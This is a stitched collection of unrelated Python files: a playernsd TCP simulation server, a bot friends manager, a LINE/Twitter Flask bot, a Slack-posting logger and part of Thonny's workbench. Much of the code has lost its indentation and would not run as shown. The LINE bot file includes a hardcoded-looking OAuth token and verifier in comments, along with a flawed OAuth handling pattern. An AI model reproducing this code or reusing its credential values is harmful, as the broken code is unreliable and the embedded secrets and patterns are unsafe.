self.send('ping\n', v.socket, k)
self.__ping_pong[k] -= 1
if self.__ping_pong[k] < -self.missed_ping:
log.warn(str(k) + ' has missed at least ' +
str(-self.__ping_pong[k]+1) + ' pings, closing connection')
self.send('error missedping\n', v.socket, k)
v.socket.shutdown(1)
except socket.error, msg:
if not self.is_timed_out(k):
self.__timed_out.append(k)
log.warn('Lost connection to ' + str(k) + ' ' + str(msg))
## Stop the client manager thread
#
# This is used to gracefully close the client manager and simulation threads.
# @param self The playernsd::ClientManager instance.
def stop(self):
    log.info('Client manager closing down...')
    if self.__sim:
      log.info('Stopping simulator...')
      self.__sim.stop()
      log.info('Simulator stopped...')
    log.info('Stopping timeout checker...')
    self.__t.cancel()
    log.info('Timeout checker stopped...')
## Request state enumeration (Internal)
class RequestState:
COMMAND = 0
MSGTEXT = 1
MSGBIN = 2
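## An informal sketch of the handler's state machine: COMMAND parses one
# newline-terminated command per iteration; a msgtext/msgbin command switches
# to MSGTEXT/MSGBIN until the payload (one line, or the declared byte count)
# has been consumed, after which the handler drops back to COMMAND.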
## The TCP request handler class interacts with clients.
#
# The TCP request handler class deals with all the connections, messages
# received and replies with the clients.
class TCPRequestHandler(SocketServer.BaseRequestHandler):
## Send a message to a client.
#
# This is a wrapper function to send a message to a client.
# By default, this sends the message to the client that invoked the request,
# but with the parameters @a s (the target socket) and
# @a ca (the target client address), any client can be messaged.
# @param self The playernsd::TCPRequestHandler instance.
# @param msg The message to be sent.
# @param s The socket to send the message to.
# @param ca The client address to send the message to.
def send(self, msg, s=None, ca=None):
if not s:
s = self.request
if not ca:
ca = self.client_address
client_manager.send(msg, s, ca)
## Broadcast a message to all clients.
#
# This is a wrapper function to broadcast a message to all clients.
# @param self The playernsd::TCPRequestHandler instance.
# @param msg The message to be sent to all clients.
def broadcast(self, msg):
client_manager.broadcast(msg)
## Receive a message from a client.
#
# This is a wrapper function to receive a message from a client and
# logs it.
# @param self The playernsd::TCPRequestHandler instance.
# @param s The socket to send the message to.
# @param ca The client address to send the message to.
# @return The message received from the client.
def recv(self, s=None, ca=None):
if not s:
s = self.request
if not ca:
ca = self.client_address
return client_manager.recv(s, ca)
## Setup a connection with a client.
#
# This is called whenever a new client connects.
# @param self The playernsd::TCPRequestHandler instance.
def setup(self):
ca = self.client_address
log.info(client_manager.get_id(ca) + ' Connected!')
self.send('greetings ' + ca[0] + ' ' + NAME + ' ' + VERSION + '\n')
client_manager.add_client(ca, self.request)
self.__state = RequestState.COMMAND
## Function that handles all client requests.
#
# For a description of the protocol, please see \ref page_protocol "Protocol for communication".
# @param self The playernsd::TCPRequestHandler instance.
def handle(self):
msgbin = ''
msg_len = 0
data = ''
__state = RequestState.COMMAND
lastlen = 0
while True:
try:
# Shorthand for client address
ca = self.client_address
# Clear anything that has timed out
if client_manager.is_timed_out(ca):
return
# Check state if we're currently reading binary msg
if __state == RequestState.MSGBIN:
if msg_len > len(data):
data += self.recv()
readlen = len(data)
msgbin += data[:msg_len]
data = data[msg_len:]
msg_len -= readlen
if msg_len <= 0:
if msg_broadcast:
self.broadcast('msgbin ' + client_manager.get_client(ca).name + ' ' +
str(len(msgbin)) + '\n' + msgbin)
else:
self.send('msgbin ' + client_manager.get_client(ca).name + ' ' +
str(len(msgbin)) + '\n' + msgbin, msg_cs, msg_ca)
__state = RequestState.COMMAND
continue
elif __state == RequestState.MSGTEXT:
# Look for new lines in current data
nlpos = data.find('\n')
if nlpos == -1:
# None found, grab some new data
data += self.recv()
# Anything to do?
if len(data) == 0:
continue
# Look for new lines in new data
nlpos = data.find('\n')
# None found: *shouldn't happen unless really slow connection*
if nlpos == -1:
# Warn about this:
log.warn(client_manager.get_id(ca) + ' Data received for msgtext, but no newline.')
continue
# Get the message text
msgtext = data[:nlpos]
# Remove that from the data
data = data[nlpos+1:]
# Send the message off
if msg_broadcast:
self.broadcast('msgtext ' + client_manager.get_client(ca).name + '\n' + msgtext)
else:
self.send('msgtext ' + client_manager.get_client(ca).name + '\n' + msgtext, msg_cs, msg_ca)
__state = RequestState.COMMAND
continue
elif __state == RequestState.COMMAND:
# Look for new lines in current data
nlpos = data.find('\n')
if nlpos == -1:
# None found, grab some new data
data += self.recv()
# Anything to do?
if len(data) == 0:
continue
# Look for new lines in new data
nlpos = data.find('\n')
# None found: *shouldn't happen unless really slow connection*
if nlpos == -1:
# Warn about this:
if lastlen != len(data):
lastlen = len(data)
log.warn(client_manager.get_id(ca) + ' Data received, but no commands.')
continue
# Parse one message out
command = data[:nlpos].split(' ')
# Remove that from the data
data = data[nlpos+1:]
# We don't need the command after we know what it is
cmd = command.pop(0)
if cmd == 'greetings':
# check parameter count
if len(command) < 3:
self.send('error invalidparamcount\n')
continue
# store the client's id for the address
cid = command.pop(0)
if client_manager.is_registered(ca):
# if already registered, don't register again (send error back)
self.send('error alreadyregistered\n')
elif client_manager.is_registered(cid):
# if it already exists, this is a problem, send back error
# and disconnect
log.error(client_manager.get_id(ca) + ' tried to connect using id \'' + cid +
'\' which is assigned to ' + client_manager.get_client(cid).name)
# tell client that name is in use
self.send('error clientidinuse\n')
else:
# add client to the list of clients & client ids & version
log.info(client_manager.get_id(ca) + ' registered with name \'' + cid + '\'')
if command[0] != NAME:
                log.error(client_manager.get_id(ca) + ' sent unexpected protocol name ' + command[0])
# terminate the connection
return
client_manager.register_client(ca, cid, command[1])
self.send("registered\n")
elif cmd == 'listclients':
# list all the client ids
clientslist = 'listclients '
for name in client_manager.get_clientid_list():
if name != None:
clientslist += name + ' '
self.send(clientslist + '\n')
elif cmd == 'propget':
# get a property value
val = propget(command[0])
if val != None:
self.send('propval ' + command[0] + ' ' + val + '\n')
else: # Ask NS3
client_manager.prop_get_sim(command[0], self.client_address)
elif cmd == 'propset':
# set a property using a key & value
# TODO: is ' '.join safe?
key = command.pop(0)
val = propget(key)
if val != None:
propset(key, ' '.join(command))
else:
client_manager.prop_set_sim(key, ' '.join(command), self.client_address)
elif cmd == 'ping':
self.send('pong\n')
elif cmd == 'pong':
client_manager.pong(ca)
elif cmd == 'bye':
return
elif not client_manager.has_client(ca):
# if client has not registered
self.send('error notregistered\n')
elif cmd == 'msgtext':
if len(command) == 0: # zero param == broadcast
# prepare to send message next loop iteration
msg_broadcast = True
__state = RequestState.MSGTEXT
elif len(command) == 1: # two params == to a particular client
# send a message to a client
cid = command.pop(0)
if client_manager.has_client(cid):
_ca = client_manager.get_client(cid).address
# prepare to send message next loop iteration
msg_ca = client_manager.get_client(cid).address
msg_cs = client_manager.get_client(_ca).socket
msg_broadcast = False
__state = RequestState.MSGTEXT
else:
self.send('error unknownclient\n')
else: # else error that the param count is invalid
self.send('error invalidparamcount\n')
elif cmd == 'msgbin':
if len(command) == 1: # one param == broadcast
msglen = command.pop(0)
              if msglen.isdigit() and int(msglen) <= MAX_SEND:
# check if all of the message is in the existing buffer
msg_len = int(msglen)
if len(data) >= msg_len:
msgbin = data[:msg_len]
data = data[msg_len:]
self.broadcast('msgbin ' + client_manager.get_client(ca).name + ' ' +
msglen + '\n' + msgbin)
else:
# Receive the required data in next iteration
msgbin = data
msg_len -= len(data)
data = ''
msg_broadcast = True
__state = RequestState.MSGBIN
else:
self.send('error invalidparam\n')
elif len(command) == 2: # two params == to a particular client
# send a binary message to a client
cid = command.pop(0)
if client_manager.has_client(cid):
_ca = client_manager.get_client(cid).address
_cs = client_manager.get_client(_ca).socket
msglen = command.pop(0)
                if msglen.isdigit() and int(msglen) <= MAX_SEND:
# check if all of the message is in the existing buffer
msg_len = int(msglen)
if len(data) >= msg_len:
msgbin = data[:msg_len]
data = data[msg_len:]
self.send('msgbin ' + client_manager.get_client(ca).name + ' ' + msglen +
'\n' + msgbin, _cs, _ca)
else:
# Receive the required data in next iteration
msgbin = data
msg_len -= len(data)
msg_cs = _cs
msg_ca = _ca
msg_broadcast = False
__state = RequestState.MSGBIN
else: # error that the parameter is invalid (expected integer)
self.send('error invalidparam\n')
else: # error that the client is unknown
self.send('error unknownclient\n')
else: # else error that the param count is invalid
self.send('error invalidparamcount\n')
else:
log.warn(client_manager.get_id(ca) + ' Unknown command "' + cmd + '".')
self.send('error unknowncmd\n')
except socket.error, msg:
log.error(msg)
return
## Function that finalises communications with the client
#
# This will clear up references to disconnected clients and makes
# sure that the playernsd::ClientManager instance
# playernsd::client_manager no longer polls it.
# @param self The playernsd::TCPRequestHandler instance.
def finish(self):
# Shorthand for client address
ca = self.client_address
log.info(client_manager.get_id(ca) + ' Disconnected!')
# delete the items
client_manager.remove_client(ca)
# server host is a tuple ('host', port)
if __name__ == "__main__":
## Instance of option parser to parse command line arguments passed
parser = optparse.OptionParser(usage="usage: %prog [options] simulatorprogram")
parser.add_option("-i", "--ip", type="string", dest="ip", default=IP,
help="listen on IP", metavar="IP")
parser.add_option("-p", "--port", type="int",
dest="port", default=PORT,
help="don't print status messages to stdout")
parser.add_option("-v", "--verbose", action="store_const", const=2, dest="verbose",
default=VERBOSE, help="verbose logging")
parser.add_option("-q", "--quiet", action="store_const", const=0, dest="verbose",
default=VERBOSE, help="quiet logging")
parser.add_option("-l", type="string", dest="logfile", default=LOGFILE,
help="specify logfile", metavar="FILE")
parser.add_option("-o", type="string", dest="sim_options", default='',
help="options to simulation")
parser.add_option("-m", "--environment-image", type="string", dest="envimage",
help="environment image for line-of-sight communication")
(options, args) = parser.parse_args()
# If args is specified, load the script file
simulation = None
if len(args) > 0:
if os.path.exists(args[0]):
# Get module extension
module, extension = os.path.splitext(args[0])
      if options.sim_options:
        fullargs = options.sim_options.split(',')
      else:
        fullargs = []
fullargs.insert(0, args[0])
def recv_callback(_from, to, msg):
client_manager.recv_sim(_from, to, msg)
def prop_val_callback(_from, prop, val):
client_manager.prop_val_sim(_from, prop, val)
if extension == '.py':
script = imp.load_source(module, args[0])
simulation = script.Simulation(fullargs, recv_callback, prop_val_callback)
else:
# Run simulation with external binary
from playernsd.simulation import Simulation
simulation = Simulation(fullargs, recv_callback, prop_val_callback)
else:
print 'Cannot load script file ' + args[0] + '.'
sys.exit(1)
# Set the settings variables
IP = options.ip
PORT = options.port
LOGFILE = options.logfile
VERBOSE = options.verbose
# Setup the logging facility
## The logging level
loglevel = logging.DEBUG
if VERBOSE == 0:
loglevel = logging.ERROR
elif VERBOSE == 1:
loglevel = logging.INFO
# Playernsd logging
log = logging.getLogger('playernsd')
# Additional debug levels (for formatting)
# Default level
log.setLevel(loglevel)
# Stream handler
formatter = logging.Formatter(LOG_FORMAT)
hs = logging.StreamHandler()
hs.setFormatter(formatter)
hs.setLevel(loglevel)
log.addHandler(hs)
# Logfile handler
hf = logging.FileHandler(LOGFILE)
hf.setFormatter(formatter)
hf.setLevel(loglevel)
log.addHandler(hf)
try:
# Say what we're listening to & that we're verbose
log.info('Listening on ' + IP + ':' + str(PORT) + '.')
log.info('Verbosity=' + logging.getLevelName(loglevel) + ' logging' + '.')
# Create the socket server
SocketServer.TCPServer.allow_reuse_address = True
server = SocketServer.ThreadingTCPServer((IP, PORT), TCPRequestHandler)
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
log.info('Server thread started.')
# Start the simulation
if simulation:
simulation.daemon = True
simulation.start()
## The client manager instance instantiated with the client timeout
# and the missed ping count
client_manager = ClientManager(CLIENT_TIMEOUT, MISSED_PING, simulation)
client_manager.daemon = True
client_manager.start()
log.info('Client manager thread started.')
# Main thread loop
while True:
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
log.info('Received keyboard interrupt, quitting threads.\n')
client_manager.stop()
# vim: ai:ts=2:sw=2:sts=2:
|
friends_manager.py
|
#!/bin/python3
import add_friends
from threading import Thread
import interaction_with_db
def main(table_name='accounts_bot'):
"""
Запускает add_friends.add_all_new_friends() для каждого бота в отдельном потоке
:param table_name: Имя таблицы с ботами в БД
:type table_name: str
"""
cur = interaction_with_db.get_cursor()
cur.execute("SELECT id FROM {}".format(table_name))
    id_bots = cur.fetchall()
threads = []
for id_bot in id_bots:
threads.append(Thread(target=add_friends.add_all_new_friends, args=(interaction_with_db.get_bot_data(cur, id_bot['id']),)))
threads[-1].start()
for thread in threads:
thread.join()
if __name__ == '__main__':
main()
|
LineBot.py
|
import tweepy
from flask import Flask, redirect, url_for, render_template,request,flash
import Data_analy
####
from multiprocessing import Process
from flask import Flask, request, abort
from linebot import (
LineBotApi, WebhookHandler
)
from linebot.exceptions import (
InvalidSignatureError
)
from linebot.models import (
MessageEvent, TextMessage, )
import Data_analy as data
import config
from DataBase.timetimetime import DB_line
url="https://ba8a4c63.ngrok.io"
DB = DB_line()
app = Flask(__name__)
CHANNEL_ACCESS_TOKEN = config.LINE_CHANNEL_ACCESS_TOKEN
CHANNEL_SECRET = config.LINE_CHANNEL_SECRET
line_bot_api = LineBotApi(CHANNEL_ACCESS_TOKEN)
handler = WebhookHandler(CHANNEL_SECRET)
GropeDict = {}
import queue
q = queue.Queue()
# @app.route("/")
# def hello_world():
# return "THIS IS LINE BOT"
@app.route("/callback", methods=['POST'])
def callback():
# get X-Line-Signature header value
signature = request.headers['X-Line-Signature']
# get request body as text
body = request.get_data(as_text=True)
app.logger.info("Request body: " + body)
# handle webhook body
try:
handler.handle(body, signature)
except InvalidSignatureError:
print("Invalid signature. Please check your channel access token/channel secret.")
abort(400)
return 'OK'
# import web_api.weather
import requests
def get_today_Weather(**kwargs) -> tuple:
id="280010"
url = f'http://weather.livedoor.com/forecast/webservice/json/v1?city={id}'
api_data = requests.get(url).json()
#print(api_data['title'])
## for weather in api_data['forecasts']:
# weather_date = weather['dateLabel']
# weather_forecasts = weather['telop']
# print(weather_date + ':' + weather_forecasts)
weather=max_temp=min_temp=None
try:
weather=api_data["forecasts"][0]["telop"]
max_temp=api_data["forecasts"][0]["temperature"]["max"]["celsius"]
min_temp = api_data["forecasts"][0]["temperature"]["min"]["celsius"]
    except (KeyError, IndexError, TypeError):
        # some fields may be missing or null when no forecast is available
        pass
finally:
return weather,max_temp,min_temp
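# Minimal usage sketch (illustrative only; the livedoor weather API called above
# has since been discontinued, so any of the three values may come back as None):
#   weather, max_temp, min_temp = get_today_Weather()
#   print(f"today: {weather}, max {max_temp}C / min {min_temp}C")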
userState={}
userId_tw={}
@handler.add(MessageEvent, message=TextMessage)
def handle_message(event):
    # Determine whether the message came from a group or an individual chat
isGroup = (event.source.type == "group")
# print(isGroup)
# print(event)
user_id = event.source.user_id
msg_t = str(event.message.text)
if isGroup:
GroupId = event.source.group_id
global GropeDict
try:
GropeDict[GroupId] += [user_id]
GropeDict[GroupId] = list(set(GropeDict[GroupId]))
        except KeyError:
GropeDict[GroupId] = [user_id]
        # Is this a recommendation request?
if msg_t in ["リクエスト", "バルス"]:
GroupId = event.source.group_id
print(GroupId)
            # Get the ID of each user in the group
# users=line_bot_api.get_group_member_ids(GroupId)
            ## Output the preferences of the users we currently know about (those who have spoken)
# print(type(users),users)
userhobby = []
            ## Query the DB for each individual user's preferences
# for u in GropeDict[GroupId]:
# userhobby.append(DB.get_talk_his_table_from_userId(u))
dbd=DB.get_talk_his_table(True)
userhobby=Data_analy.countWords(dbd)
userhobby=userhobby[0]
# userhobby = list(set(userhobby))
# print("userhobby::", userhobby)
# userhobby = ",".join(userhobby)
LineSender(line_bot_api).sendMessage(text=userhobby+"をおすすめすると話題になるかもしれません。", user_id=GroupId)
return
    # Individual (one-on-one) chat
else:
if msg_t=="tw_get":
userState[user_id]="q:t"
LineSender(line_bot_api).sendMessage(text="@から始まるTwitterIDを教えてね",user_id=user_id)
return
elif "@" in msg_t and userState[user_id]=="q:t":
userState[user_id]=None
userId_tw[user_id]=msg_t
LineSender(line_bot_api).sendMessage(text="OK!次のURLから連携してね",user_id=user_id)
LineSender(line_bot_api).sendMessage(text=url+"/twitter-regit",user_id=user_id)
return
print(user_id)
for w in Data_analy.wordAnyly(msg_t):
DB.set_talk_history(user_id,text=w)
# msg_t = str(event.message.text)
#print(msg_t)
# print(type(event))
# user_id = event.source.user_id
# profile = line_bot_api.get_profile(user_id)
# status = (profile.status_message)
# print(profile.display_name,msg_t)
# msg = TextMessage(text=f"name::{profile.display_name}\n"
# f"status_message::{status}")
# weather,max_temp,min_temp=get_today_Weather()
# msg=f"今日の天気は,{weather}\n" \
# f"最高気温は{max_temp}℃です。\n" \
# f"最低気温は{min_temp}℃です." \
# user=LineUser(userId=user_id)
# DB.set_new_user(user_id, user.name)
# words = data.analy(msg_t)
msg = "DBに保存しました"+msg_t
LineSender(line_bot_api).sendMessage(str(msg),user_id)
# msg_t=TextMessage(text=msg)
# msg2=TextMessage(text=str(user))
# for r in range(10):
# line_bot_api.push_message(user_id, msg_t)
# line_bot_api.push_message(user_id, msg2)
# line_bot_api.push_message(user_id, msg_t)
def q_put(q, msg):
q.put(msg)
class LineUser:
def __init__(self,reply=None,userId=None):
        '''LINE user information class. The userId can be taken
        from a reply, or passed in directly as userId.
        The name and status message are then fetched through the LINE API.
        '''
        # If neither reply nor userId is given, userId is set to None
if (reply or userId):
            ## Get the userId from the reply
if reply:
self.userId = reply.source.user_id
else:
self.userId=userId
            # Fetch the name and status message from the profile
profile = line_bot_api.get_profile(self.userId)
self.status = (profile.status_message)
self.name=profile.display_name
else:
self.userId=None
self.name=None
self.status=None
def __eq__(self, other):
if type(other)==LineUser:
return self.userId == other.userId
else:
return self.userId== other
def __str__(self):
return f"userId::{self.userId}\n" \
f"userName::{self.name}\n" \
f"userStatus::{self.status}"
class LineSender:
def __init__(self,lineins:LineBotApi):
self.line_bot_api=lineins
def sendMessage(self,text:str,user_id:LineUser):
if isinstance(user_id,LineUser):
user_id=user_id.userId
msg=TextMessage(text=text)
self.line_bot_api.push_message(to=user_id,messages=msg)
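# Usage sketch for the two helper classes above (the user ID is illustrative):
#   user = LineUser(userId="U0123456789abcdef")  # fetches name/status via the LINE API
#   LineSender(line_bot_api).sendMessage(text="hello", user_id=user)  # accepts a LineUser or a raw ID string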
############################ HTML TWITTER SERVER ############################
import twitter
ck = config.tw_ck
cs = config.tw_cs
auth = tweepy.OAuthHandler(ck, cs)
app.secret_key = config.tw_secret_key  # required for flash()
@app.route("/")
def tw_INDEX():
return render_template("index_.html")
@app.route('/twitter-regit')
def tw_main():
try:
redirect_url = auth.get_authorization_url()
print("tw regit")
# return render_template("index.html", redirect_url=redirect_url)
return redirect(redirect_url)
except tweepy.TweepError as r:
flash('認証に失敗しました。もう一度やり直してください。')
print(r.reason)
return render_template("error.html")
# return render_template("index.html", redirect_url=redirect_url)
@app.route('/twitter-callback')
def tw_callback():
try:
token = request.values.get('oauth_token', '')
verifier = request.values.get('oauth_verifier', '')
flash('認証に成功しました。しばらくお待ちください')
#################
auth.request_token = {'oauth_token':token, 'oauth_token_secret':verifier}
try:
auth.get_access_token(verifier)
except tweepy.TweepError:
            print('Error: failed to get access token.')
# AT = auth.access_token
# AS = auth.access_token_secret
api=tweepy.API(auth,wait_on_rate_limit=False)
# ScreenName;
print(api.me())
for favorite in tweepy.Cursor(api.favorites).items(50):
# Basic information about the user who created the tweet that was favorited
# print('\n\n\nTweet Author:')
            # # Print the screen name of the tweet's author
# print('Screen Name: ' + str(favorite.user.screen_name.encode("utf-8")))
# print('Name: ' + str(favorite.user.name.encode("utf-8")))
#
# # Basic information about the tweet that was favorited
# print('\nTweet:')
# # Print the id of the tweet the user favorited
# print('Tweet Id: ' + str(favorite.id))
# # Print the text of the tweet the user favorited
print('Tweet Text: ' + str(favorite.text.encode("utf-8")))
        # for tweet in tweepy.Cursor(api.user_timeline, screen_name="ACCOUNT_NAME_TO_FETCH", exclude_replies=True).items():
# tweet_data.append(
# [tweet.id, tweet.created_at, tweet.text.replace('\n', ''), tweet.favorite_count, tweet.retweet_count])
# ################
    except Exception:
        pass
    # Render the callback page on success as well as on failure
    return render_template("callback.html", token=token, verifier=verifier)
# except Exception as e:
# print("callback error",e)
# return render_template("error.html")
# @app.route('/tw/<id>')
# def tw_callback(id):
# try:
# # token = request.values.get('oauth_token', '')
# # verifier = request.values.get('oauth_verifier', '')
# #flash('認証に成功しました。')
#
# token="YgcasAAAAAABAX3zAAABbeaxN6E"
# verifier="CyXOWyFrwcRb3KLBCpqMkbXoDLTuUtZW"
#
# #################
# auth.request_token = {'oauth_token':token, 'oauth_token_secret':verifier}
# try:
# auth.get_access_token(verifier)
# except tweepy.TweepError:
# print('Erroredirect Failed to get access token.')
#
# AT = auth.access_token
# AS = auth.access_token_secret
#
# api=tweepy.API(auth,wait_on_rate_limit=False)
# # ScreenName;
# print(api.me())
# for favorite in tweepy.Cursor(api.favorites,id=id).items(20):
# # Basic information about the user who created the tweet that was favorited
# print('\n\n\nTweet Author:')
# # Print the screen name of the tweets auther
# print('Screen Name: ' + str(favorite.user.screen_name.encode("utf-8")))
# print('Name: ' + str(favorite.user.name.encode("utf-8")))
#
# # Basic information about the tweet that was favorited
# print('\nTweet:')
# # Print the id of the tweet the user favorited
# print('Tweet Id: ' + str(favorite.id))
# # Print the text of the tweet the user favorited
# print('Tweet Text: ' + str(favorite.text.encode("utf-8")))
#
# # ################
# except:
# pass
#
# return render_template("callback.html", token=token, verifier=verifier)
# # except Exception as e:
# # print("callback error",e)
# # return render_template("error.html")
#
@app.route("/users/<username>")
def createHTML(username):
    ## TODO: fetch hobby, icon, name, and SNS links from the database
iconURL=sns=hobby="None"
try:
userid=DB.get_id(username)
hobby=DB.get_talk_his_table_from_userId(userid)
except:
pass
    # hobby=['American football', 'Kemono Friends']
# # hobby=",".join(hobby)
# iconURL="https://booth.pximg.net/0e273b68-3273-49c3-8e2b-90672b1ea0cc/i/487672/ff1c97aa-1775-4320-8a5e-6a7cbabf2460_base_resized.jpg"
twitter="https://twitter.com/ユーザー名"
facebook="https://twitter.com/ユーザー名"
google_plus="https://twitter.com/ユーザー名"
tumblr="https://twitter.com/ユーザー名"
youtube="https://twitter.com/ユーザー名"
return render_template("meishi.html",icon_img=iconURL,user_name=username,hobby_list=hobby,
twitter=twitter,google_plus=google_plus,facebook=facebook,youtube=youtube)
@app.route('/input', methods=["POST"])
def tw_input():
if request.method == "POST":
text = request.form["text"]
token = request.form["token"]
verifier = request.form["verifier"]
auth.request_token = {'oauth_token':token, 'oauth_token_secret':verifier}
try:
auth.get_access_token(verifier)
except tweepy.TweepError:
            print('Error: failed to get access token.')
AT = auth.access_token
AS = auth.access_token_secret
api=tweepy.API(auth,wait_on_rate_limit=False)
# ScreenName;
print(api.me())
tweepy.Cursor(api.favorites)
twitter.twitter_fav(text,AT,AS)
flash(text + 'を含むツイートにいいねをつけました。')
return redirect("https://twi-api-test.herokuapp.com/")
def get_goodTweet():
pass
def _args():
app.run(debug=False, host='0.0.0.0', port=5000)
def start():
s = Process(target=_args)
s.start()
return q
if __name__ == "__main__":
q = start()
# # app.run(debug=True, host='0.0.0.0', port=5000)
# userId="U8c8b0e06213c94bc4c7f42cac57cf1a7"
# user=LineUser(userId=userId)
# sender=LineSender(line_bot_api)
    import time
    while True:
        # sender.sendMessage(text=str(user),user_id=user)
        time.sleep(1)  # keep the parent process alive without busy-waiting
|
infolog.py
|
import atexit
from datetime import datetime
import json
from threading import Thread
from urllib.request import Request, urlopen
_format = '%Y-%m-%d %H:%M:%S.%f'
_file = None
_run_name = None
_slack_url = None
def init(filename, run_name, slack_url=None):
global _file, _run_name, _slack_url
_close_logfile()
_file = open(filename, 'a',encoding='utf-8')
_file.write('\n-----------------------------------------------------------------\n')
_file.write('Starting new training run\n')
_file.write('-----------------------------------------------------------------\n')
_run_name = run_name
_slack_url = slack_url
def log(msg, slack=False):
print(msg)
if _file is not None:
_file.write('[%s] %s\n' % (datetime.now().strftime(_format)[:-3], msg))
if slack and _slack_url is not None:
Thread(target=_send_slack, args=(msg,)).start()
def _close_logfile():
global _file
if _file is not None:
_file.close()
_file = None
def _send_slack(msg):
req = Request(_slack_url)
req.add_header('Content-Type', 'application/json')
urlopen(req, json.dumps({
'username': 'tacotron',
'icon_emoji': ':taco:',
'text': '*%s*: %s' % (_run_name, msg)
}).encode())
atexit.register(_close_logfile)
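# Minimal usage sketch (filename and run name are illustrative; slack_url, if
# given, should be a Slack incoming-webhook URL):
#   init('train.log', 'demo-run')
#   log('step 100: loss=0.123')           # console + logfile
#   log('training finished', slack=True)  # also posted to Slack when configured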
|
workbench.py
|
# -*- coding: utf-8 -*-
import ast
import collections
import importlib
import logging
import os.path
import pkgutil
import platform
import queue
import re
import socket
import sys
import tkinter as tk
import tkinter.font as tk_font
import traceback
import webbrowser
import gettext
from threading import Thread
from tkinter import ttk, messagebox
from typing import (
Any,
Callable,
Dict,
List,
Optional, # pylint: disable=unused-import
Sequence,
Set, # pylint: disable=unused-import
Tuple, # pylint: disable=unused-import
Type,
Union,
cast,
) # pylint: disable=unused-import
from warnings import warn
import thonny
from thonny import (
THONNY_USER_DIR,
get_runner,
running,
ui_utils,
assistance,
languages,
get_shell,
is_portable,
)
from thonny.code import EditorNotebook
from thonny.common import Record, UserError, normpath_with_actual_case
from thonny.config import try_load_configuration
from thonny.config_ui import ConfigurationDialog
from thonny.misc_utils import (
running_on_linux,
running_on_mac_os,
running_on_windows,
running_on_rpi,
copy_to_clipboard,
)
from thonny.running import BackendProxy, Runner
from thonny.shell import ShellView
from thonny.ui_utils import (
AutomaticNotebook,
AutomaticPanedWindow,
create_tooltip,
get_style_configuration,
lookup_style_option,
register_latin_shortcut,
select_sequence,
sequence_to_accelerator,
)
SERVER_SUCCESS = "OK"
SIMPLE_MODE_VIEWS = ["ShellView"]
MenuItem = collections.namedtuple("MenuItem", ["group", "position_in_group", "tester"])
BackendSpec = collections.namedtuple(
"BackendSpec", ["name", "proxy_class", "description", "config_page_constructor", "sort_key"]
)
BasicUiThemeSettings = Dict[str, Dict[str, Union[Dict, Sequence]]]
CompoundUiThemeSettings = List[BasicUiThemeSettings]
UiThemeSettings = Union[BasicUiThemeSettings, CompoundUiThemeSettings]
FlexibleUiThemeSettings = Union[UiThemeSettings, Callable[[], UiThemeSettings]]
SyntaxThemeSettings = Dict[str, Dict[str, Union[str, int, bool]]]
FlexibleSyntaxThemeSettings = Union[SyntaxThemeSettings, Callable[[], SyntaxThemeSettings]]
OBSOLETE_PLUGINS = [
"thonnycontrib.pi",
"thonnycontrib.micropython",
"thonnycontrib.circuitpython",
"thonnycontrib.microbit",
"thonnycontrib.esp",
]
class Workbench(tk.Tk):
"""
Thonny's main window and communication hub.
Is responsible for:
* creating the main window
* maintaining layout (_init_containers)
* loading plugins (_init_plugins, add_view, add_command)
* providing references to main components (editor_notebook and runner)
* communication between other components (see event_generate and bind)
* configuration services (get_option, set_option, add_defaults)
* loading translations
* maintaining fonts (named fonts, increasing and decreasing font size)
After workbench and plugins get loaded, 3 kinds of events start happening:
* User events (keypresses, mouse clicks, menu selections, ...)
* Virtual events (mostly via get_workbench().event_generate). These include:
events reported via and dispatched by Tk event system;
WorkbenchEvent-s, reported via and dispatched by enhanced get_workbench().event_generate.
* Events from the background process (program output notifications, input requests,
notifications about debugger's progress)
"""
def __init__(self) -> None:
thonny._workbench = self
self._closing = False
self._destroyed = False
self._lost_focus = False
self._is_portable = is_portable()
self.initializing = True
self._init_configuration()
self._check_init_server_loop()
tk.Tk.__init__(self, className="Thonny")
tk.Tk.report_callback_exception = self._on_tk_exception # type: ignore
self._event_handlers = {} # type: Dict[str, Set[Callable]]
self._images = (
set()
) # type: Set[tk.PhotoImage] # keep images here to avoid Python garbage collecting them,
self._default_image_mapping = (
{}
) # type: Dict[str, str] # to allow specify default alternative images
self._image_mapping_by_theme = (
{}
) # type: Dict[str, Dict[str, str]] # theme-based alternative images
self._current_theme_name = "clam" # will be overwritten later
self._backends = {} # type: Dict[str, BackendSpec]
self._commands = [] # type: List[Dict[str, Any]]
self._toolbar_buttons = {}
self._view_records = {} # type: Dict[str, Dict[str, Any]]
self.content_inspector_classes = [] # type: List[Type]
self._latin_shortcuts = {} # type: Dict[Tuple[int,int], List[Tuple[Callable, Callable]]]
self._init_diagnostic_logging()
self._init_language()
self._active_ui_mode = os.environ.get("THONNY_MODE", self.get_option("general.ui_mode"))
self._init_scaling()
self._add_main_backends()
self._init_theming()
self._init_window()
self.add_view(ShellView, _("Shell"), "s", visible_by_default=True, default_position_key="A")
assistance.init()
self._runner = Runner()
self._load_plugins()
self._editor_notebook = None # type: Optional[EditorNotebook]
self._init_fonts()
self.reload_themes()
self._init_menu()
self._init_containers()
assert self._editor_notebook is not None
self._init_program_arguments_frame()
self._init_regular_mode_link()
self._show_views()
# Make sure ShellView is loaded
get_shell()
self._init_commands()
self._init_icon()
try:
self._editor_notebook.load_startup_files()
except Exception:
self.report_exception()
self._editor_notebook.focus_set()
self._try_action(self._open_views)
self.bind_class("CodeViewText", "<<CursorMove>>", self.update_title, True)
self.bind_class("CodeViewText", "<<Modified>>", self.update_title, True)
self.bind_class("CodeViewText", "<<TextChange>>", self.update_title, True)
self.get_editor_notebook().bind("<<NotebookTabChanged>>", self.update_title, True)
self.bind_all("<KeyPress>", self._on_all_key_presses, True)
self.bind("<FocusOut>", self._on_focus_out, True)
self.bind("<FocusIn>", self._on_focus_in, True)
self._publish_commands()
self.initializing = False
self.event_generate("<<WorkbenchInitialized>>")
self._make_sanity_checks()
if self._is_server():
self._poll_ipc_requests()
self.after(1, self._start_runner) # Show UI already before waiting for the backend to start
def _make_sanity_checks(self):
home_dir = os.path.expanduser("~")
bad_home_msg = None
if home_dir == "~":
bad_home_msg = "Can not find your home directory."
elif not os.path.exists(home_dir):
bad_home_msg = "Reported home directory (%s) does not exist." % home_dir
if bad_home_msg:
messagebox.showwarning(
"Problems with home directory",
bad_home_msg + "\nThis may cause problems for Thonny.",
)
